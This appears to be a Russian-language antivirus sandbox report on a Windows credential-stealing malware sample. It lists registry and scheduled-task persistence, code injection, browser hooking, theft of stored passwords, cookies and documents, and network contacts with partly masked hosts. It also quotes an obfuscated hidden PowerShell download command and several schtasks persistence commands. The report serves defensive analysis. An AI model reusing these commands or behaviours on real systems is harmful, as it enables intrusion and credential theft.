Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Sound device' = 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nt...
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'smss' = '"%ProgramFiles(x86)%\mIRC\defaults\scripts\smss.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'msiexec' = '"<SYSTEM32>\aepic\msiexec.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'explorer' = '"C:\reviewbrokercrtCommon\explorer.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'explorer' = '"C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\explorer.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'mdm' = '"C:\Documents and Settings\mdm.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'services' = '"<SYSTEM32>\LAPRXY\services.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'cmd' = '"%WINDIR%\SysWOW64\WsmRes\cmd.exe"'
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\firefox default browser agent 70636cad85446bc8
- %APPDATA%\microsoft\windows\start menu\programs\startup\sound device.lnk
- <SYSTEM32>\tasks\smss
- <SYSTEM32>\tasks\msiexec
- <SYSTEM32>\tasks\explorer
- <SYSTEM32>\tasks\mdm
- <SYSTEM32>\tasks\services
- <SYSTEM32>\tasks\cmd
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Системный антивирус (Защитник Windows)
Загружает и запускает на исполнение
- (http://19#.#6.146.55/ru+nti+m+ebr+oke+r.exe
Загружает
- http://19#.#6.146.55/api/getfile2
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\explorer.exe
- %WINDIR%\explorer.exe
следующие пользовательские процессы:
- 1440.exe
Перехватывает функции
в браузерах
- Процесс iexplore.exe, модуль wininet.dll
- Процесс firefox.exe, модуль nss3.dll
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами
- [<HKCU>\Software\Martin Prikryl]
- [<HKLM>\Software\Wow6432Node\Martin Prikryl]
Читает файлы, отвечающие за хранение паролей сторонними программами
- %APPDATA%\mozilla\firefox\profiles.ini
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %APPDATA%\opera software\opera stable\login data
- %APPDATA%\thunderbird\profiles.ini
- %ProgramFiles(x86)%\steam\config\config.vdf
- %ProgramFiles(x86)%\steam\config\dialogconfig.vdf
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %HOMEPATH%\desktop\adhd_and_obesity.docx
- %HOMEPATH%\desktop\applicantform_en.doc
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\glidescope_review_rev_010.docx
- %HOMEPATH%\desktop\hadac_newsletter_july_2010_final.docx
- %HOMEPATH%\desktop\nwfieldnotes1966.docx
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\refurtw
- %TEMP%\rarsfx0\system.runtime.compilerservices.unsafe.dll
- %TEMP%\rarsfx0\system.numerics.vectors.dll
- %TEMP%\rarsfx0\system.memory.dll
- %TEMP%\rarsfx0\system.io.compression.dll
- %TEMP%\rarsfx0\system.data.sqlite.dll
- %TEMP%\rarsfx0\system.buffers.dll
- %TEMP%\rarsfx0\x64\sqlite.interop.dll
- %TEMP%\rarsfx0\x86\sqlite.interop.dll
- %TEMP%\rarsfx0\newtonsoft.json.dll
- %TEMP%\rarsfx0\svc_host.exe.config
- %TEMP%\rarsfx0\bouncycastle.crypto.dll
- %TEMP%\rarsfx0\system.runtime.compilerservices.unsafe.xml
- %TEMP%\rarsfx0\system.numerics.vectors.xml
- %TEMP%\rarsfx0\system.memory.xml
- %TEMP%\rarsfx0\system.data.sqlite.xml
- %TEMP%\rarsfx0\system.buffers.xml
- %TEMP%\rarsfx0\newtonsoft.json.xml
- %TEMP%\rarsfx0\bouncycastle.crypto.xml
- %TEMP%\sbvc.exe
- nul
- %TEMP%\rarsfx0\svc_host.exe
- %TEMP%\rarsfx0\svc_host.pdb
- %TEMP%\e6r14sn41j
- %TEMP%\kp2dty47ha
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\nwfieldnotes1966.docx
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\hadac_newsletter_july_2010_final.docx
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\glidescope_review_rev_010.docx
- %APPDATA%\kdnqkqax.nds\grabber\steam\config\config.vdf
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\fi51.doc
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\applicantform_en.doc
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\adhd_and_obesity.docx
- %TEMP%\52ghd6n9wd
- %TEMP%\p9dwvr8rhr
- %TEMP%\n344njrjn5
- %TEMP%\oywaxhsfii
- %TEMP%\xpijc2how7
- %TEMP%\ukajk3loqu
- %TEMP%\6hbjkdh3fr
- %TEMP%\jstnzbojqj
- %TEMP%\oufslvw9l8
- %TEMP%\ouilka2ly2
- %TEMP%\edk2nkdynr
- %TEMP%\cwjl1juuea
- %TEMP%\zs5ft0dgl0
- %TEMP%\788dn5ohea
- %TEMP%\eshvi25bmf.bat
- %APPDATA%\kdnqkqax.nds\pcinfo.txt
- %TEMP%\qbs7kmulic
- %WINDIR%\syswow64\wsmres\cmd.exe
- %TEMP%\3728.tmp
- %TEMP%\3562.tmp
- %TEMP%\3552.tmp-shm
- %TEMP%\3552.tmp
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %TEMP%\1eac.exe
- %TEMP%\37d4.tmp
- %TEMP%\1440.exe
- %TEMP%\f1d0.exe
- C:\reviewbrokercrtcommon\trdyjlei.vbe
- C:\reviewbrokercrtcommon\reviewbrokercrtcommonsessionperfdll.exe
- C:\reviewbrokercrtcommon\5odlarohl.bat
- %TEMP%\e0a0.exe
- %ALLUSERSPROFILE%\runtimebroker.exe
- %TEMP%\d2c9.exe
- %TEMP%\c7a2.exe
- %APPDATA%\hagdgtr
- %TEMP%\fcaa.exe
- %TEMP%\3814.tmp
- %TEMP%\3824.tmp
- %TEMP%\38d1.tmp
- <SYSTEM32>\laprxy\c5b4cb5e9653cce737f29f72ba880dd4c4bab27d
- <SYSTEM32>\laprxy\services.exe
- C:\documents and settings\559fba5f8e44108851927af432f0edac6117c574
- C:\documents and settings\mdm.exe
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\7a0fd90576e08807bde2cc57bcf9854bbce05fe3
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\explorer.exe
- C:\reviewbrokercrtcommon\7a0fd90576e08807bde2cc57bcf9854bbce05fe3
- C:\reviewbrokercrtcommon\explorer.exe
- <SYSTEM32>\aepic\133006b48fb54b65ec2045921283a18304e24d5a
- <SYSTEM32>\aepic\msiexec.exe
- %ProgramFiles(x86)%\mirc\defaults\scripts\69ddcba757bf72f7d36c464c71f42baab150b2b9
- %ProgramFiles(x86)%\mirc\defaults\scripts\smss.exe
- %TEMP%\3975.tmp-shm
- %TEMP%\3975.tmp
- %TEMP%\3955.tmp
- %TEMP%\3944.tmp
- %TEMP%\3934.tmp
- %TEMP%\3923.tmp
- %TEMP%\3912.tmp
- %TEMP%\3902.tmp
- %TEMP%\38e2.tmp
- %WINDIR%\syswow64\wsmres\ebf1f9fa8afd6d1932bd65bc4cc3af89a4c8e228
- %APPDATA%\kdnqkqax.nds\browsers\cookies\firefox mozilla_cookies.txt
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\refurtw
- %APPDATA%\hagdgtr
Удаляет следующие файлы
- %TEMP%\3552.tmp-shm
- %TEMP%\52ghd6n9wd
- %APPDATA%\kdnqkqax.nds\browsers\cookies\firefox mozilla_cookies.txt
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\adhd_and_obesity.docx
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\applicantform_en.doc
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\fi51.doc
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\glidescope_review_rev_010.docx
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\hadac_newsletter_july_2010_final.docx
- %APPDATA%\kdnqkqax.nds\grabber\desktop\docs\nwfieldnotes1966.docx
- %APPDATA%\kdnqkqax.nds\grabber\steam\config\config.vdf
- %APPDATA%\kdnqkqax.nds\pcinfo.txt
- %TEMP%\rarsfx0\bouncycastle.crypto.dll
- %TEMP%\rarsfx0\bouncycastle.crypto.xml
- %TEMP%\rarsfx0\newtonsoft.json.dll
- %TEMP%\rarsfx0\svc_host.exe
- %TEMP%\rarsfx0\x64\sqlite.interop.dll
- %TEMP%\rarsfx0\svc_host.exe.config
- %TEMP%\rarsfx0\svc_host.pdb
- %TEMP%\rarsfx0\system.buffers.dll
- %TEMP%\rarsfx0\system.buffers.xml
- %TEMP%\rarsfx0\system.data.sqlite.dll
- %TEMP%\rarsfx0\system.data.sqlite.xml
- %TEMP%\rarsfx0\system.io.compression.dll
- %TEMP%\rarsfx0\system.memory.dll
- %TEMP%\rarsfx0\system.memory.xml
- %TEMP%\rarsfx0\system.numerics.vectors.dll
- %TEMP%\rarsfx0\system.numerics.vectors.xml
- %TEMP%\rarsfx0\system.runtime.compilerservices.unsafe.dll
- %TEMP%\rarsfx0\system.runtime.compilerservices.unsafe.xml
- %TEMP%\p9dwvr8rhr
- %TEMP%\rarsfx0\newtonsoft.json.xml
- %TEMP%\n344njrjn5
- %TEMP%\3955.tmp
- %TEMP%\3552.tmp
- %TEMP%\3562.tmp
- %TEMP%\3728.tmp
- %TEMP%\37d4.tmp
- %TEMP%\3814.tmp
- %TEMP%\3824.tmp
- %TEMP%\38d1.tmp
- %TEMP%\38e2.tmp
- %TEMP%\3902.tmp
- %TEMP%\3912.tmp
- %TEMP%\3923.tmp
- %TEMP%\3934.tmp
- %TEMP%\3944.tmp
- %TEMP%\3975.tmp-shm
- %TEMP%\xpijc2how7
- %TEMP%\3975.tmp
- %TEMP%\qbs7kmulic
- %TEMP%\e6r14sn41j
- %TEMP%\kp2dty47ha
- %TEMP%\788dn5ohea
- %TEMP%\zs5ft0dgl0
- %TEMP%\cwjl1juuea
- %TEMP%\edk2nkdynr
- %TEMP%\ouilka2ly2
- %TEMP%\oufslvw9l8
- %TEMP%\jstnzbojqj
- %TEMP%\6hbjkdh3fr
- %TEMP%\ukajk3loqu
- %TEMP%\oywaxhsfii
- %TEMP%\rarsfx0\x86\sqlite.interop.dll
Самоудаляется.
Сетевая активность
Подключается к
- '91.##1.19.52':80
- '19#.#6.146.55':80
- '45.##.231.40':80
- 're#####listforjuly2.xyz':80
- 'te##te.in':443
- '13#.#25.172.201':80
- '95.##1.155.150':80
- 'dc####.#00webhostapp.com':443
- 'ch####p.dyndns.org':80
- 'ip##fo.io':80
TCP
Запросы HTTP GET
- http://re#####listforjuly2.xyz/raccon.exe
- http://re#####listforjuly2.xyz/reestr.exe
- http://19#.#6.146.55/Api/GetTask/178BFBFF000406F15DACFFCE
- http://ip##fo.io/95.211.190.199
Запросы HTTP POST
- http://re#####listforjuly1.xyz/
- http://re#####listforjuly2.xyz/
- http://45.##.231.40/
Другие
- 'te##te.in':443
- 'dc####.#00webhostapp.com':443
UDP
- DNS ASK re#####listforjuly1.xyz
- DNS ASK re#####listforjuly2.xyz
- DNS ASK te##te.in
- DNS ASK dc####.#00webhostapp.com
- DNS ASK ch####p.dyndns.org
- DNS ASK ip##fo.io
- 'localhost':123
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
- '%TEMP%\c7a2.exe'
- '%TEMP%\fcaa.exe'
- '%TEMP%\sbvc.exe'
- 'C:\documents and settings\mdm.exe'
- '%TEMP%\1eac.exe'
- 'C:\reviewbrokercrtcommon\reviewbrokercrtcommonsessionperfdll.exe'
- '%TEMP%\1440.exe'
- '%WINDIR%\syswow64\wscript.exe' "C:\reviewbrokercrtCommon\TrdyjLEi.vbe"
- '%ALLUSERSPROFILE%\runtimebroker.exe'
- '%TEMP%\d2c9.exe'
- '%TEMP%\f1d0.exe'
- '%TEMP%\rarsfx0\svc_host.exe'
- '%TEMP%\e0a0.exe'
- '%TEMP%\sbvc.exe' ' (со скрытым окном)
- '%ALLUSERSPROFILE%\runtimebroker.exe' ' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\reviewbrokercrtCommon\5odLAROhl.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\eSHvI25bMf.bat"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\reviewbrokercrtCommon\5odLAROhl.bat" "
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\explorer.exe'
- '<SYSTEM32>\schtasks.exe' /create /tn "smss" /sc ONLOGON /tr "'%ProgramFiles(x86)%\mIRC\defaults\scripts\smss.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "msiexec" /sc ONLOGON /tr "'<SYSTEM32>\aepic\msiexec.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "explorer" /sc ONLOGON /tr "'C:\reviewbrokercrtCommon\explorer.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\explorer.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "mdm" /sc ONLOGON /tr "'C:\Documents and Settings\mdm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "services" /sc ONLOGON /tr "'<SYSTEM32>\LAPRXY\services.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "cmd" /sc ONLOGON /tr "'%WINDIR%\SysWOW64\WsmRes\cmd.exe'" /rl HIGHEST /f
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\eSHvI25bMf.bat"
- '<SYSTEM32>\chcp.com' 65001
- '<SYSTEM32>\w32tm.exe' /stripchart /computer:localhost /period:5 /dataonly /samples:2
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose
